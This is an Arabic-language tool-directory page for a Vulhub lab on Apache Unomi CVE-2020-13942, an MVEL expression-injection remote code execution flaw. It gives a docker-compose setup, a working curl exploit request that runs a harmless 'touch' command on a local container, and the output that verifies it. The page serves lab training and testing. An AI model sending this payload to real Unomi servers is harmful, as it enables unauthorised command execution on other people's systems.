Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/corsisechero/cve-2020-13942byvulhub
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubcorsisechero/cve-2020-13942byvulhub

CVE-2020-13942byVulHub

# بيئة مختبر خطوة بخطوة واستغلال لثغرة Apache Unomi CVE-2020-13942، مع توضيح حقن لغة تعبيرات MVEL المؤدي إلى تنفيذ التعليمات البرمجية عن بُعد.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-13942 بواسطة VulHub


Apache Unomi حقن لغة التعبير RCE (CVE-2020-13942)

الوصف

تسمح هذه الثغرة بتنفيذ أوامر تعسفية على الأنظمة التي تشغّل Apache Unomi الإصدار 1.5.1، عبر استغلال حقن لغة التعبير MVEL.

صفحة المشروع

GitHub - Vulhub - Unomi CVE-2020-13942


إعداد البيئة

ملف Docker Compose (docker-compose.yml)

root@kitploit:~
version: '2'
services:
  web:
    image: vulhub/unomi:1.5.1
    ports:
      - "9443:9443"
      - "8181:8181"
    environment:
      - UNOMI_ELASTICSEARCH_ADDRESSES=elasticsearch:9200
    depends_on:
      - elasticsearch
  elasticsearch:
    image: elasticsearch:7.9.3
    environment:
      - cluster.name=contextElasticSearch
      - discovery.type=single-node
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
      - bootstrap.memory_lock=true

تشغيل الحاويات

قم بتشغيل الحاويات باستخدام الأمر التالي:

root@kitploit:~
docker compose up -d

تنفيذ الاستغلال

الأمر الذي يجب تنفيذه من Kali

أرسل الطلب POST التالي باستخدام curl:

root@kitploit:~
curl -X POST http://localhost:8181/context.json \
     -H "Accept-Encoding: gzip, deflate" \
     -H "Accept: */*" \
     -H "Accept-Language: en" \
     -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" \
     -H "Connection: close" \
     -H "Content-Type: application/json" \
     -d '{
    "filters": [
        {
            "id": "sample",
            "filters": [
                {
                    "condition": {
                         "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"touch /tmp/pluto\");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}'

التحقق من الاستغلال

الوصول إلى الحاوية

ادخل إلى الحاوية للتحقق من إنشاء الملف:

root@kitploit:~
docker exec -it af7de05fc47e ls /tmp

فحص النتيجة

تحقق من وجود الملف pluto:

root@kitploit:~
hsperfdata_root  pluto

إذا كان الملف pluto موجودًا، فهذا يعني أن الاستغلال نجح.


ملاحظات أمنية

تسمح هذه الثغرة بتنفيذ أوامر تعسفية. استخدم هذه الاختبارات فقط في بيئات خاضعة للتحكم ولأغراض الدراسة أو التحقق. استغلال الثغرات في بيئات غير مصرح بها غير قانوني.

تنزيل الأداة